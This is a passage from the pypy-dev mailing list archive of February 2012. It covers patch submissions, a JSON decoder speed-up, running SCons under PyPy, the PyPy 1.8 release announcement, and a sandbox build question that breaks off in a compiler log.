What OS is it? Also, what exact > version of PyPy are you using? We fixed a few things here recently. > > > A bientôt, > > Armin. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Ah, we just figured out you're using an old pypy. Try a new checkout and the issue should be fixed. Cheers, fijal From alex0player at gmail.com Mon Feb 6 16:06:43 2012 From: alex0player at gmail.com (Alexander Sedov) Date: Mon, 6 Feb 2012 19:06:43 +0400 Subject: [pypy-dev] Please, someone, send this patch Message-ID: Wasted two hours trying to get into the IRC channel and post this. Please someone, commit this minor, useless patch. http://paste.pocoo.org/show/546747/ -------------- next part -------------- An HTML attachment was scrubbed... URL: From benjamin at python.org Mon Feb 6 16:07:24 2012 From: benjamin at python.org (Benjamin Peterson) Date: Mon, 6 Feb 2012 10:07:24 -0500 Subject: [pypy-dev] Please, someone, send this patch In-Reply-To: References: Message-ID: 2012/2/6 Alexander Sedov : > Wasted two hours trying to get into the IRC channel and post this. Please > someone, commit this minor, useless patch. > http://paste.pocoo.org/show/546747/ If it's minor and useless, why should it go in? -- Regards, Benjamin From piotr.skamruk at gmail.com Mon Feb 6 16:49:06 2012 From: piotr.skamruk at gmail.com (Piotr Skamruk) Date: Mon, 6 Feb 2012 16:49:06 +0100 Subject: [pypy-dev] Please, someone, send this patch In-Reply-To: References: Message-ID: it fixes an obvious typo, so it's not so useless... 2012/2/6 Benjamin Peterson : > 2012/2/6 Alexander Sedov : >> Wasted two hours trying to get into the IRC channel and post this. Please >> someone, commit this minor, useless patch. >> http://paste.pocoo.org/show/546747/ > > If it's minor and useless, why should it go in?
> > > > -- > Regards, > Benjamin > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From tbaldridge at gmail.com Mon Feb 6 19:54:47 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Mon, 6 Feb 2012 12:54:47 -0600 Subject: [pypy-dev] Status of LLVM backend Message-ID: I haven't heard much about using PyPy with LLVM recently, and just wanted to know what the status of it was. Was there ever much of an improvement in using PyPy with LLVM for code generation? Does the binary install of PyPy use LLVM? Thanks for the info, Timothy -- "One of the main causes of the fall of the Roman Empire was that, lacking zero, they had no way to indicate successful termination of their C programs." (Robert Firth) From fijall at gmail.com Mon Feb 6 20:17:54 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 6 Feb 2012 21:17:54 +0200 Subject: [pypy-dev] Status of LLVM backend In-Reply-To: References: Message-ID: On Mon, Feb 6, 2012 at 8:54 PM, Timothy Baldridge wrote: > I haven't heard much about using PyPy with LLVM recently, and just > wanted to know what the status of it was. Was there ever much of an > improvement in using PyPy with LLVM for code generation? Does the > binary install of PyPy use LLVM? > > Thanks for the info, > > Timothy Hi. PyPy's LLVM backend has been tried and discontinued several times, because we always ran into some LLVM limitations or bugs or both. It would probably be interesting to try again at some time, to *actually* see what the improvements would be.
Cheers, fijal From s.parmesan at gmail.com Tue Feb 7 11:27:22 2012 From: s.parmesan at gmail.com (Stefano Parmesan) Date: Tue, 7 Feb 2012 11:27:22 +0100 Subject: [pypy-dev] JSON decoder speed-up Message-ID: Hi everybody, A while ago I submitted a pull-request after cleaning up the source code of the JSON decoder a bit; if anybody wants to check it out, it's here: https://bitbucket.org/pypy/pypy/pull-request/26/json-decoder-speed-up Some experimental tests here, if you are interested: http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ (not enormous speed-ups, but still...) Cheers! -- Dott. Stefano Parmesan PhD Student ~ University of Trento From cfbolz at gmx.de Tue Feb 7 11:33:50 2012 From: cfbolz at gmx.de (Carl Friedrich Bolz) Date: Tue, 07 Feb 2012 11:33:50 +0100 Subject: [pypy-dev] Please, someone, send this patch In-Reply-To: References: Message-ID: <4F30FE0E.4090906@gmx.de> On 02/06/2012 04:06 PM, Alexander Sedov wrote: > Wasted two hours trying to get into the IRC channel and post this. Please > someone, commit this minor, useless patch. > http://paste.pocoo.org/show/546747/ Hi Alexander, thanks for noticing and sorry to hear about IRC. Benjamin committed the patch: bitbucket.org/pypy/pypy/changeset/e112d1cfaa95/ He also added a test, which in general should come together with a patch.
Cheers, Carl Friedrich From fijall at gmail.com Tue Feb 7 11:43:10 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 7 Feb 2012 12:43:10 +0200 Subject: [pypy-dev] JSON decoder speed-up In-Reply-To: References: Message-ID: On Tue, Feb 7, 2012 at 12:27 PM, Stefano Parmesan wrote: > Hi everybody, > > A while ago I submitted a pull-request after cleaning a bit the source code > of the JSON decoder, if anybody wants to check it out, it's > here: https://bitbucket.org/pypy/pypy/pull-request/26/json-decoder-speed-up > Some experimental tests here, if you are interested: > http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ > > (not enormous speed-ups, but still...) > > Cheers! Hey. I've been eyeing this (it's on my TODO list) for a while and I keep that in mind. However, as we're closing in on the release I would not like to merge this without a thorough review and I simply did not have time for that recently at all. Apologies for this taking so long (it should not be that long) and I hope to review this really soon. Cheers, fijal From s.parmesan at gmail.com Tue Feb 7 11:52:56 2012 From: s.parmesan at gmail.com (Stefano Parmesan) Date: Tue, 7 Feb 2012 11:52:56 +0100 Subject: [pypy-dev] JSON decoder speed-up In-Reply-To: References: Message-ID: Right, I forgot about the 1.8 release. No worries, and thank you! -- Dott. Stefano Parmesan PhD Student ~ University of Trento wrote: > On Tue, Feb 7, 2012 at 12:27 PM, Stefano Parmesan > wrote: > > Hi everybody, > > > > A while ago I submitted a pull-request after cleaning a bit the source > code > > of the JSON decoder, if anybody wants to check it out, it's > > here: > https://bitbucket.org/pypy/pypy/pull-request/26/json-decoder-speed-up > > Some experimental tests here, if you are interested: > > http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ > > > > (not enormous speed-ups, but still...) > > > > Cheers! > > Hey.
> > I've been eyeing this (it's on my TODO list) for a while and I keep > that in mind. However, as we're closing in on the release I would not > like to merge this without a thorough review and I simply did not have > time for that recently at all. Apologies for this taking so long (it > should not be that long) and I hope to review this really soon. > > Cheers, > fijal > -------------- next part -------------- An HTML attachment was scrubbed... URL: From santagada at gmail.com Tue Feb 7 14:02:38 2012 From: santagada at gmail.com (Leonardo Santagada) Date: Tue, 7 Feb 2012 11:02:38 -0200 Subject: [pypy-dev] JSON decoder speed-up In-Reply-To: References: Message-ID: On Tue, Feb 7, 2012 at 8:27 AM, Stefano Parmesan wrote: > Some experimental tests here, if you are interested: > http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ Looking at your post I see that you used https://github.com/kracekumar/cerealization/ to measure performance. Couldn't this be added to the speed.pypy.org benchmark set? Probably after the 1.8 release too. -- Leonardo Santagada From s.parmesan at gmail.com Tue Feb 7 15:27:08 2012 From: s.parmesan at gmail.com (Stefano Parmesan) Date: Tue, 7 Feb 2012 15:27:08 +0100 Subject: [pypy-dev] Unused imports Message-ID: Hi everybody, I notice that the pypy source code is sprinkled with unused imports, does anybody know if this affects performance in any way? Are they automatically removed in some way? -- Dott. Stefano Parmesan PhD Student ~ University of Trento From arigo at tunes.org Tue Feb 7 15:36:07 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 7 Feb 2012 15:36:07 +0100 Subject: [pypy-dev] Unused imports In-Reply-To: References: Message-ID: Hi Stefano, On Tue, Feb 7, 2012 at 15:27, Stefano Parmesan wrote: > I notice that the pypy source code is sprinkled with unused imports, does > anybody know if this affects performance in any way? Are they automatically > removed in some way? No performance impact.
It's just a matter of clarity: it would be nice if someone could provide a clean-up. A bientôt, Armin. From s.parmesan at gmail.com Tue Feb 7 15:59:59 2012 From: s.parmesan at gmail.com (Stefano Parmesan) Date: Tue, 7 Feb 2012 15:59:59 +0100 Subject: [pypy-dev] Unused imports In-Reply-To: References: Message-ID: That may take a while =) pylint would help here, though... Sounds counterintuitive, but if it doesn't affect performance it's okay, I guess Thanks! -- Dott. Stefano Parmesan PhD Student ~ University of Trento wrote: > Hi Stefano, > > On Tue, Feb 7, 2012 at 15:27, Stefano Parmesan > wrote: > > I notice that the pypy source code is sprinkled with unused imports, does > > anybody know if this affects performance in any way? Are they > automatically > > removed in some way? > > No performance impact. It's just a matter of clarity: it would be > nice if someone could provide a clean-up. > > > A bientôt, > > Armin. > -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Tue Feb 7 16:12:19 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 7 Feb 2012 17:12:19 +0200 Subject: [pypy-dev] Unused imports In-Reply-To: References: Message-ID: On Tue, Feb 7, 2012 at 4:59 PM, Stefano Parmesan wrote: > That may take a while =) pylint would help here, though... > > Sounds counterintuitive, but if it doesn't affect performance it's okay, I > guess > > Thanks! pyflakes is better at it btw (fewer false positives) and faster. I remove them each time I open a file, but it takes a while. From alex0player at gmail.com Wed Feb 8 08:49:45 2012 From: alex0player at gmail.com (Alexander Sedov) Date: Wed, 8 Feb 2012 11:49:45 +0400 Subject: [pypy-dev] Please, someone, send this patch In-Reply-To: <4F30FE0E.4090906@gmx.de> References: <4F30FE0E.4090906@gmx.de> Message-ID: 2012/2/7 Carl Friedrich Bolz : > On 02/06/2012 04:06 PM, Alexander Sedov wrote: >> >> Wasted two hours trying to get into the IRC channel and post this.
Please >> someone, commit this minor, useless patch. >> http://paste.pocoo.org/show/546747/ > > > Hi Alexander, > > thanks for noticing and sorry to hear about IRC. Benjamin committed the > patch: > > bitbucket.org/pypy/pypy/changeset/e112d1cfaa95/ > > He also added a test, which in general should come together with a patch. > > Cheers, > > Carl Friedrich Glad to hear. Also, thanks Benjamin for the test. I'm not really into the PyPy testing system. From russel at russel.org.uk Wed Feb 8 18:40:47 2012 From: russel at russel.org.uk (Russel Winder) Date: Wed, 08 Feb 2012 17:40:47 +0000 Subject: [pypy-dev] Seeking a bit of guidance Message-ID: <1328722847.9949.31.camel@anglides.russel.org.uk> For some reason I had assumed that pypy could be a drop-in replacement for python. I am on Debian Unstable and I suspect that my assumption is being thwarted. In particular in trying to run SCons. |> python /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py scons: Reading SConscript files ... scons: done reading SConscript files. scons: Building targets ... stopServerIfNeedBe(["allPDFs"], []) scons: done building targets. |> pypy /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py Traceback (most recent call last): File "app_main.py", line 51, in run_toplevel File "/home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py", line 187, in import SCons.Script ImportError: No module named SCons This may be a SCons problem or a Debian Python packaging issue but the higher likelihood is a PyPy configuration issue? Basically I am not sure where to start. I use SCons from a Mercurial clone, Python from Debian packages, PyPy from the downloaded binary distribution. |> python --version Python 2.7.2+ |> pypy --version Python 2.7.1 (7773f8fc4223, Nov 18 2011, 18:47:11) [PyPy 1.7.0 with GCC 4.4.3] Help and guidance gratefully received. Thanks. -- Russel.
============================================================================= Dr Russel Winder t: +44 20 7585 2200 voip: sip:russel.winder at ekiga.net 41 Buckmaster Road m: +44 7770 465 077 xmpp: russel at russel.org.uk London SW11 1EN, UK w: www.russel.org.uk skype: russel_winder -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: This is a digitally signed message part URL: From fijall at gmail.com Wed Feb 8 18:51:43 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 8 Feb 2012 19:51:43 +0200 Subject: [pypy-dev] Seeking a bit of guidance In-Reply-To: <1328722847.9949.31.camel@anglides.russel.org.uk> References: <1328722847.9949.31.camel@anglides.russel.org.uk> Message-ID: On Wed, Feb 8, 2012 at 7:40 PM, Russel Winder wrote: > For some reason I had assumed that pypy could be a drop in replacement > for python. I am on Debian Unstable and I am suspected that my > assumption is being thwarted. In particular in trying to run SCons. > > |> python /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py > scons: Reading SConscript files ... > scons: done reading SConscript files. > scons: Building targets ... > stopServerIfNeedBe(["allPDFs"], []) > scons: done building targets. > > |> pypy /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py > Traceback (most recent call last): > File "app_main.py", line 51, in run_toplevel > File "/home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py", line 187, in > import SCons.Script > ImportError: No module named SCons > > This may be a SCons problem or a Debian Python packaging issue but > higher likelihood is a PyPy configuration issue? Basically I am not > sure where to start. > > I use SCons from a Mercurial clone, Python from Debian packages, PyPy > from then downloaded binary distribution.
> > |> python --version > Python 2.7.2+ > > |> pypy --version > Python 2.7.1 (7773f8fc4223, Nov 18 2011, 18:47:11) > [PyPy 1.7.0 with GCC 4.4.3] > > Help and guidance gratefully received. Thanks. > -- > Russel. > ============================================================================= > Dr Russel Winder t: +44 20 7585 2200 voip: sip:russel.winder at ekiga.net > 41 Buckmaster Road m: +44 7770 465 077 xmpp: russel at russel.org.uk > London SW11 1EN, UK w: www.russel.org.uk skype: russel_winder > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > Hey. PyPy does not automatically pick up Python packages installed for the system python. The same would actually be true for CPython if you installed it from sources. I suggest using virtualenv and creating one with pypy as an executable and then installing stuff using pip or easy_install. Cheers, fijal From arigo at tunes.org Wed Feb 8 18:57:50 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 8 Feb 2012 18:57:50 +0100 Subject: [pypy-dev] Seeking a bit of guidance In-Reply-To: <1328722847.9949.31.camel@anglides.russel.org.uk> References: <1328722847.9949.31.camel@anglides.russel.org.uk> Message-ID: Hi Russel, On Wed, Feb 8, 2012 at 18:40, Russel Winder wrote: > ImportError: No module named SCons You need to install SCons for this PyPy. That's just the same as installing it manually for the particular version of CPython you're testing: you get its sources and run "pypy setup.py install". The difference is that SCons is also available as a package in your Linux distribution; this package is for CPython 2.7 --- a particular version of CPython. The Debian package of SCons would not work with a different version of CPython, nor with PyPy. A bientôt, Armin.
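The advice in the two replies above can be sketched as a shell session. This is a hedged sketch: it assumes a pypy binary on PATH and the virtualenv tool installed; the environment name pypy-env and the scons package are illustrative, and the commands are guarded so they are a no-op where those tools are absent:

```shell
# Create a virtualenv whose interpreter is pypy; anything installed with
# pip while it is active goes into this environment, not into the system
# CPython's packages.
if command -v virtualenv >/dev/null 2>&1 && command -v pypy >/dev/null 2>&1; then
    virtualenv -p "$(command -v pypy)" pypy-env
    . pypy-env/bin/activate
    pip install scons            # or: run "pypy setup.py install" from a source tree
    pypy -c "import SCons"       # the module is now importable by pypy
else
    echo "virtualenv and/or pypy not found; commands shown for illustration"
fi
```

With the environment active, pip and pypy both refer to the env's own copies, which is what makes the installed SCons visible to PyPy but not to /usr/bin/python.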
From russel at russel.org.uk Wed Feb 8 19:24:31 2012 From: russel at russel.org.uk (Russel Winder) Date: Wed, 08 Feb 2012 18:24:31 +0000 Subject: [pypy-dev] Seeking a bit of guidance In-Reply-To: References: <1328722847.9949.31.camel@anglides.russel.org.uk> Message-ID: <1328725471.9949.60.camel@anglides.russel.org.uk> Maciej, Armin, A combined response... On Wed, 2012-02-08 at 19:51 +0200, Maciej Fijalkowski wrote: > PyPy does not automatically pick up python packages installed for the > system python. The same would actually be true for CPython if you > installed it from sources. I suggest using virtualenv and creating one > with pypy as an executable and then installing stuff using pip or > easy_install. On Wed, 2012-02-08 at 18:57 +0100, Armin Rigo wrote: Hi Russel, > > On Wed, Feb 8, 2012 at 18:40, Russel Winder wrote: > > ImportError: No module named SCons > > You need to install SCons for this PyPy. That's just the same as > installing it manually for the particular version of CPython you're > testing: you get its sources and run "pypy setup.py install". The > difference is that SCons is also available as a package in your Linux > distribution; this package is for CPython 2.7 --- a particular version > of CPython. The Debian package of SCons would not work with a > different version of CPython, nor with PyPy. I understand the points being made above, and I really appreciate the speedy replies, thanks to you both. However, due to my bad explanation I suspect, I think we may be at cross purposes. I do indeed have the Debian SCons package installed, but as far as I know I am not actually making use of any of it -- but this is more an hypothesis than any actual fact. If I was installing SCons then clearly it would need installing separately for CPython and PyPy as each Python installation maintains its own package set (*). 
However, I am running SCons directly from a Mercurial repository, using the bootstrap.py code which manipulates paths and spawns a subprocess to ensure the subprocess has the right "environment". What I should perhaps have said more explicitly is that my problem is that python executes this script and everything works whereas pypy doesn't execute the script in the same way. The script in question is: https://bitbucket.org/scons/scons/src/cdc0f05249c6/bootstrap.py I don't immediately see why PyPy would behave differently executing this script than the CPython 2.7.2 that works fine. I am increasingly of the view that I am looking but not seeing... (*) Though I do like the Debian solution of depositing things in a shared location and then appearing to install them for each installed Python. -- Russel. ============================================================================= Dr Russel Winder t: +44 20 7585 2200 voip: sip:russel.winder at ekiga.net 41 Buckmaster Road m: +44 7770 465 077 xmpp: russel at russel.org.uk London SW11 1EN, UK w: www.russel.org.uk skype: russel_winder -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: This is a digitally signed message part URL: From russel at russel.org.uk Wed Feb 8 19:32:56 2012 From: russel at russel.org.uk (Russel Winder) Date: Wed, 08 Feb 2012 18:32:56 +0000 Subject: [pypy-dev] Seeking a bit of guidance In-Reply-To: <1328725471.9949.60.camel@anglides.russel.org.uk> References: <1328722847.9949.31.camel@anglides.russel.org.uk> <1328725471.9949.60.camel@anglides.russel.org.uk> Message-ID: <1328725976.9949.64.camel@anglides.russel.org.uk> On Wed, 2012-02-08 at 18:24 +0000, Russel Winder wrote: [...]
The script in > question is: > > https://bitbucket.org/scons/scons/src/cdc0f05249c6/bootstrap.py > > I don't immediately see why PyPy would behave different executing this > script that the CPython 2.7.2 that works fine. I am increasingly of the > view that I am looking but not seeing... Aha... that is the point, that script is behaving exactly the same in both cases, I was using the wrong command line. |> python /home/Checkouts/Mercurial/SCons/bootstrap.py /usr/bin/python /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py scons: Reading SConscript files ... scons: done reading SConscript files. scons: Building targets ... stopServerIfNeedBe(["allPDFs"], []) scons: done building targets. |> pypy /home/Checkouts/Mercurial/SCons/bootstrap.py /home/users/russel/bin.Linux.x86_64/pypy /home/Checkouts/Mercurial/SCons/bootstrap/src/script/scons.py scons: Reading SConscript files ... ImportError: No module named uno: File "/home/users/russel/Work/Courses/Groovy_OneDayWorkshop/SConstruct", line 21: import odfConverterServer File "/home/users/russel/lib/Python/lib/python2.7/odfConverterServer.py", line 27: from PyODFConverter import DEFAULT_OPENOFFICE_PORT , DocumentConverter , DocumentConversionException File "/home/users/russel/lib/Python/lib/python2.7/PyODFConverter.py", line 40: from uno import getComponentContext , systemPathToFileUrl Now that makes much more sense. Now I just need to get some packages into the PyPy tree that are not there yet. Maciej, Armin, thanks for indirectly pointing me in the right direction. -- Russel. ============================================================================= Dr Russel Winder t: +44 20 7585 2200 voip: sip:russel.winder at ekiga.net 41 Buckmaster Road m: +44 7770 465 077 xmpp: russel at russel.org.uk London SW11 1EN, UK w: www.russel.org.uk skype: russel_winder -------------- next part -------------- A non-text attachment was scrubbed... 
Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: This is a digitally signed message part URL: From fijall at gmail.com Wed Feb 8 20:52:24 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 8 Feb 2012 21:52:24 +0200 Subject: [pypy-dev] JSON decoder speed-up In-Reply-To: References: Message-ID: On Tue, Feb 7, 2012 at 12:52 PM, Stefano Parmesan wrote: > Right, I forgot about the 1.8 release. No worries, and thank you! For what it's worth, the branch fails tests. > > -- > Dott. Stefano Parmesan > PhD Student ~ University of Trento > Tel: 0461-235794 ext. 5544 > > > > On 7 February 2012 11:43, Maciej Fijalkowski wrote: >> >> On Tue, Feb 7, 2012 at 12:27 PM, Stefano Parmesan >> wrote: >> > Hi everybody, >> > >> > A while ago I submitted a pull-request after cleaning a bit the source >> > code >> > of the JSON decoder, if anybody wants to check it out, it's >> > >> > here: https://bitbucket.org/pypy/pypy/pull-request/26/json-decoder-speed-up >> > Some experimental tests here, if you are interested: >> > http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ >> > >> > (not enormous speed-ups, but still...) >> > >> > Cheers! >> >> Hey. >> >> I've been eyeing this (it's on my TODO list) for a while and I keep >> that in mind. However, as we're closing in on the release I would not >> like to merge this without a thorough review and I simply did not have >> time for that recently at all. Apologies for this taking so long (it >> should not be that long) and I hope to review this really soon. >> >> Cheers, >> fijal > > From fijall at gmail.com Wed Feb 8 21:03:06 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 8 Feb 2012 22:03:06 +0200 Subject: [pypy-dev] JSON decoder speed-up In-Reply-To: References: Message-ID: On Wed, Feb 8, 2012 at 9:52 PM, Maciej Fijalkowski wrote: > On Tue, Feb 7, 2012 at 12:52 PM, Stefano Parmesan wrote: >> Right, I forgot about the 1.8 release. No worries, and thank you!
> > For what it's worth, the branch fails tests. No, sorry, my bad, it's my old pypy > >> >> -- >> Dott. Stefano Parmesan >> PhD Student ~ University of Trento >> > Tel: 0461-235794 ext. 5544 >> >> >> >> On 7 February 2012 11:43, Maciej Fijalkowski wrote: >>> >>> On Tue, Feb 7, 2012 at 12:27 PM, Stefano Parmesan >>> wrote: >>> > Hi everybody, >>> > >>> > A while ago I submitted a pull-request after cleaning a bit the source >>> > code >>> > of the JSON decoder, if anybody wants to check it out, it's >>> > >>> > here: https://bitbucket.org/pypy/pypy/pull-request/26/json-decoder-speed-up >>> > Some experimental tests here, if you are interested: >>> > http://armisael.silix.org/2012/01/speeding-up-json-decoder-in-pypy/ >>> > >>> > (not enormous speed-ups, but still...) >>> > >>> > Cheers! >>> >>> Hey. >>> >>> I've been eyeing this (it's on my TODO list) for a while and I keep >>> that in mind. However, as we're closing in on the release I would not >>> like to merge this without a thorough review and I simply did not have >>> time for that recently at all. Apologies for this taking so long (it >>> should not be that long) and I hope to review this really soon. >>> >>> Cheers, >>> fijal >> >> From fijall at gmail.com Fri Feb 10 10:44:33 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 10 Feb 2012 11:44:33 +0200 Subject: [pypy-dev] PyPy 1.8 released Message-ID: ============================ PyPy 1.8 - business as usual ============================ We're pleased to announce the 1.8 release of PyPy. As usual, this release brings a lot of bugfixes, together with performance and memory improvements over the 1.7 release. The main highlight of the release is the introduction of `list strategies`_ which makes homogeneous lists more efficient both in terms of performance and memory. This release also upgrades us from Python 2.7.1 compatibility to 2.7.2.
Otherwise it's "business as usual" in the sense that performance improved roughly 10% on average since the previous release. You can download the PyPy 1.8 release here: http://pypy.org/download.html .. _`list strategies`: http://morepypy.blogspot.com/2011/10/more-compact-lists-with-list-strategies.html What is PyPy? ============= PyPy is a very compliant Python interpreter, almost a drop-in replacement for CPython 2.7. It's fast (`pypy 1.8 and cpython 2.7.1`_ performance comparison) due to its integrated tracing JIT compiler. This release supports x86 machines running Linux 32/64, Mac OS X 32/64 or Windows 32. Windows 64 work has been stalled; we would welcome a volunteer to handle that. .. _`pypy 1.8 and cpython 2.7.1`: http://speed.pypy.org Highlights ========== * List strategies. Now lists that contain only ints or only floats should be as efficient as storing them in a binary-packed array. It also improves the JIT performance in places that use such lists. There are also special strategies for unicode and string lists. * As usual, numerous performance improvements. There are many examples of python constructs that now should be faster; too many to list. * Bugfixes and compatibility fixes with CPython. * Windows fixes. * NumPy effort progress; for the exact list of things that have been done, consult the `numpy status page`_. A tentative list of things that have been done: * multi-dimensional arrays * various sizes of dtypes * a lot of ufuncs * a lot of other minor changes Right now the `numpy` module is available under both `numpy` and `numpypy` names. However, because it's incomplete, you have to `import numpypy` first before doing any imports from `numpy`. * New JIT hooks that allow you to hook into the JIT process from your python program. There is a `brief overview`_ of what they offer.
Ongoing work ============ As usual, there is quite a bit of ongoing work that either didn't make it to the release or is not ready yet. Highlights include: * Non-x86 backends for the JIT: ARMv7 (almost ready) and PPC64 (in progress) * Specialized type instances - allocate instances as efficient as C structs, including type specialization * More numpy work * Since the last release there was a significant breakthrough in PyPy's fundraising. We now have enough funds to work on first stages of `numpypy`_ and `py3k`_. We would like to thank again to everyone who donated. * It's also probably worth noting, we're considering donations for the Software Transactional Memory project. You can read more about `our plans`_ Cheers, The PyPy Team .. _`brief overview`: http://doc.pypy.org/en/latest/jit-hooks.html .. _`numpy status page`: http://buildbot.pypy.org/numpy-status/latest.html .. _`numpy status update blog report`: http://morepypy.blogspot.com/2012/01/numpypy-status-update.html .. _`numpypy`: http://pypy.org/numpydonate.html .. _`py3k`: http://pypy.org/py3donate.html .. _`our plans`: http://morepypy.blogspot.com/2012/01/transactional-memory-ii.html From dynamicgl at gmail.com Fri Feb 10 11:46:56 2012 From: dynamicgl at gmail.com (gelin yan) Date: Fri, 10 Feb 2012 18:46:56 +0800 Subject: [pypy-dev] PyPy 1.8 released In-Reply-To: References: Message-ID: On Fri, Feb 10, 2012 at 5:44 PM, Maciej Fijalkowski wrote: > ============================ > PyPy 1.8 - business as usual > ============================ > > We're pleased to announce the 1.8 release of PyPy. As habitual this > release brings a lot of bugfixes, together with performance and memory > improvements over the 1.7 release. The main highlight of the release > is the introduction of `list strategies`_ which makes homogenous lists > more efficient both in terms of performance and memory. This release > also upgrades us from Python 2.7.1 compatibility to 2.7.2. 
Otherwise > it's "business as usual" in the sense that performance improved > roughly 10% on average since the previous release. > > you can download the PyPy 1.8 release here: > > http://pypy.org/download.html > > .. _`list strategies`: > > http://morepypy.blogspot.com/2011/10/more-compact-lists-with-list-strategies.html > > What is PyPy? > ============= > > PyPy is a very compliant Python interpreter, almost a drop-in replacement > for > CPython 2.7. It's fast (`pypy 1.8 and cpython 2.7.1`_ performance > comparison) > due to its integrated tracing JIT compiler. > > This release supports x86 machines running Linux 32/64, Mac OS X 32/64 or > Windows 32. Windows 64 work has been stalled, we would welcome a volunteer > to handle that. > > .. _`pypy 1.8 and cpython 2.7.1`: http://speed.pypy.org > > > Highlights > ========== > > * List strategies. Now lists that contain only ints or only floats should > be as efficient as storing them in a binary-packed array. It also improves > the JIT performance in places that use such lists. There are also special > strategies for unicode and string lists. > > * As usual, numerous performance improvements. There are many examples > of python constructs that now should be faster; too many to list them. > > * Bugfixes and compatibility fixes with CPython. > > * Windows fixes. > > * NumPy effort progress; for the exact list of things that have been done, > consult the `numpy status page`_. A tentative list of things that has > been done: > > * multi dimensional arrays > > * various sizes of dtypes > > * a lot of ufuncs > > * a lot of other minor changes > > Right now the `numpy` module is available under both `numpy` and `numpypy` > names. However, because it's incomplete, you have to `import numpypy` > first > before doing any imports from `numpy`. > > * New JIT hooks that allow you to hook into the JIT process from your > python > program. There is a `brief overview`_ of what they offer. 
> > * Standard library upgrade from 2.7.1 to 2.7.2. > > Ongoing work > ============ > > As usual, there is quite a bit of ongoing work that either didn't make it > to > the release or is not ready yet. Highlights include: > > * Non-x86 backends for the JIT: ARMv7 (almost ready) and PPC64 (in > progress) > > * Specialized type instances - allocate instances as efficient as C > structs, > including type specialization > > * More numpy work > > * Since the last release there was a significant breakthrough in PyPy's > fundraising. We now have enough funds to work on first stages of > `numpypy`_ > and `py3k`_. We would like to thank again to everyone who donated. > > * It's also probably worth noting, we're considering donations for the > Software Transactional Memory project. You can read more about `our > plans`_ > > Cheers, > The PyPy Team > > .. _`brief overview`: http://doc.pypy.org/en/latest/jit-hooks.html > .. _`numpy status page`: http://buildbot.pypy.org/numpy-status/latest.html > .. _`numpy status update blog report`: > http://morepypy.blogspot.com/2012/01/numpypy-status-update.html > .. _`numpypy`: http://pypy.org/numpydonate.html > .. _`py3k`: http://pypy.org/py3donate.html > .. _`our plans`: > http://morepypy.blogspot.com/2012/01/transactional-memory-ii.html > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > a great job...I will give a try tonight... -------------- next part -------------- An HTML attachment was scrubbed... URL: From phyo.arkarlwin at gmail.com Fri Feb 10 16:30:32 2012 From: phyo.arkarlwin at gmail.com (Phyo Arkar) Date: Fri, 10 Feb 2012 22:00:32 +0630 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: <4F2E9B54.3090501@oz.net> References: <4F2E3B68.20506@gmx.de> <4F2E9B54.3090501@oz.net> Message-ID: :D That made me sprew all the copy over my laptop! 
On Sun, Feb 5, 2012 at 9:38 PM, Bengt Richter wrote:
> On 02/05/2012 12:18 AM Ronny Pfannschmidt wrote:
>
>> rpython is NOT indented for app-level development.
>>
> Does indentation work differently in rpython?
>
> Regards,
> Bengt Richter
> Sorry, could not resist ;-)
>
>
> _______________________________________________
> pypy-dev mailing list
> pypy-dev at python.org
> http://mail.python.org/mailman/listinfo/pypy-dev
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From kracethekingmaker at gmail.com  Sun Feb 12 00:12:54 2012
From: kracethekingmaker at gmail.com (kracekumar ramaraju)
Date: Sun, 12 Feb 2012 04:42:54 +0530
Subject: [pypy-dev] Unable to run sandbox pypy
Message-ID:

Hello

I am on CentOS 64 bit (cat /proc/version => Linux version 2.6.32-220.4.1.el6.x86_64 (mockbuild at c6b18n1.dev.centos.org) (gcc version 4.4.6 20110731 (Red Hat 4.4.6-3) (GCC) ) #1 SMP Tue Jan 24 02:13:44 GMT 2012), so I assume it's the RH 4.4.6-3 version.

On running `nohup /home/kracekumar/src/pypy-1.7/bin/pypy pypy/pypy/translator/goal/translate.py -O2 --sandbox &`, nohup exited.
Here is tail -10 nohup.out:

[platform:execute] gcc -c -O3 -pthread -fomit-frame-pointer -Wall -Wno-unused /home/kracekumar/opt/usession-master-0/platcheck_20.c -o /home/kracekumar/opt/usession-master-0/platcheck_20.o
[platform:execute] gcc /home/kracekumar/opt/usession-master-0/platcheck_20.o -pthread -lrt -o /home/kracekumar/opt/usession-master-0/platcheck_20
